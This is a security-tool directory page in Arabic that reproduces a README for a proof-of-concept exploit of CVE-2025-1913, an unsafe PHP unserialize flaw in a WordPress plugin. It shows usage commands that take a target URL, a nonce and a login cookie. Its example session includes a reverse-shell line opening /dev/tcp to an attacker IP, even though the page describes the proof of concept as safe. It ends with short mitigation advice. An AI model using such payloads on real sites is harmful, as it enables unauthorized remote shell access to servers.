Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-1913-PoC — A PoC demonstrating CVE-2025-1913, showing how the plugin’s unsafe unserialize handling can lead to high-impact behavior in controlled environments. Contains a harmful payload for authorized testing only. Use strictly in isolated labs and for defensive research. | Kitploit
أدوات/GitHubGitHub/s0haib518-ksa/cve-2025-1913-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubs0haib518-ksa/cve-2025-1913-poc

CVE-2025-1913-PoC

A PoC demonstrating CVE-2025-1913, showing how the plugin’s unsafe unserialize handling can lead to high-impact behavior in controlled environments. Contains a harmful payload for authorized testing only. Use strictly in isolated labs and for defensive research.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
2منذ 7 أشهرلم تتم المراجعة بعد

CVE-2025-1913 -- إثبات المفهوم (PoC)

يحتوي هذا المستودع على إثبات مفهوم تعليمي فقط لـ CVE-2025-1913، من إنشاء Suhaib518 🇸🇦. يوضح إثبات المفهوم هذا كيف يمكن لمدخلات PHP المسلسلة المصممة خصيصًا أن تؤدي إلى تفعيل منطق قابل للاستغلال في مكونات ووردبريس المتأثرة. إثبات المفهوم آمن ولا يتضمن حمولات ضارة.

⚠️ إخلاء مسؤولية: إثبات المفهوم هذا مخصص للتعلم والبحث واختبار الأمان الدفاعي فقط. لا تستخدمه على خوادم لا تملكها أو ليس لديك إذن صريح لاختبارها.


📌 نظرة عامة

الضعف موجود بسبب المعالجة غير الآمنة لبيانات PHP المسلسلة في سير عمل معينة لإضافات ووردبريس. يُظهر إثبات المفهوم هذا كيف يمكن لمهاجم تقديم هياكل مسلسلة مصممة تسبب سلوكًا داخليًا غير مقصود.

يتضمن هذا المستودع سكربت بايثون يقوم بما يلي:

  • بناء كائنات PHP مسلسلة مخصصة
  • تشفيرها لنقاط نهاية تصدير ووردبريس المبنية على AJAX
  • إرسال طلب مُتحكم به لإظهار المشكلة بأمان

📂 الملفات في هذا المستودع

root@kitploit:~
.
├── CVE-2025-1913-PoC.py         # سكربت إثبات المفهوم من إنشاء Suhaib518 المملكة العربية السعودية
└── README.md                    # التوثيق

🚀 الاستخدام

1. تثبيت المتطلبات

يستخدم السكربت وحدات بايثون المضمنة فقط باستثناء requests:

root@kitploit:~
pip install requests

2. تشغيل سكربت الاستغلال التفاعلي

root@kitploit:~
python3 exploit.py \
  -c "Class" \
  -H "https://target.com" \
  --wp-nonce "1234567890" \
  --cookie "wordpress_logged_in=YOUR_COOKIE_HERE"

سيُطلب منك:

  • عد الخصائص التي تريد تضمينها
  • الاسم والقيمة لكل خاصية

سيقوم السكربت بعد ذلك بتسلسلها، بناء طلب ووردبريس، وإرساله.


✔️ مثال أمر (تيار الاستغلال الناجح)

فيما يلي مثال أمر يوضح الاستخدام بقيم توضيحية (هذه ليست ضارة، بل تُظهر العملية فقط):

root@kitploit:~
python3 exploit.py   -c "WP_User_Query"   -H "https://example.com"   --wp-nonce "89f1a2b3c4"   --cookie "wordpress_logged_in_abc123=abcd1234efgh5678"

أمثلة لإجابات الأسئلة التفاعلية:

root@kitploit:~
[?] كم خاصية تمتلك هذه الفئة؟ 2
[?] اسم الخاصية #1: file
[?] القيمة لـ 'file': shell.sh
[?] اسم الخاصية #2: shell
[?] القيمة لـ 'shell': sh -i >& /dev/tcp/IP/PORT 0>&1

سيقوم السكربت بعد ذلك بطباعة:

root@kitploit:~
[*] جاري إرسال الطلب…
....تحقق من المستمع للحصول على الشل.

🛡️ التخفيف (على المستوى العالي)

  • تجنب استخدام unserialize() على مدخلات غير موثوقة
  • تحقق من جميع معاملات النماذج وطلبات AJAX
  • حافظ على تحديث الإضافات
  • استخدم صيغ بيانات حديثة مثل JSON بدلاً من تسلسل PHP

📜 الترخيص

رخصة MIT.


🙌 المؤلف

من إنشاء Suhaib518 🇸🇦.

تنزيل الأداة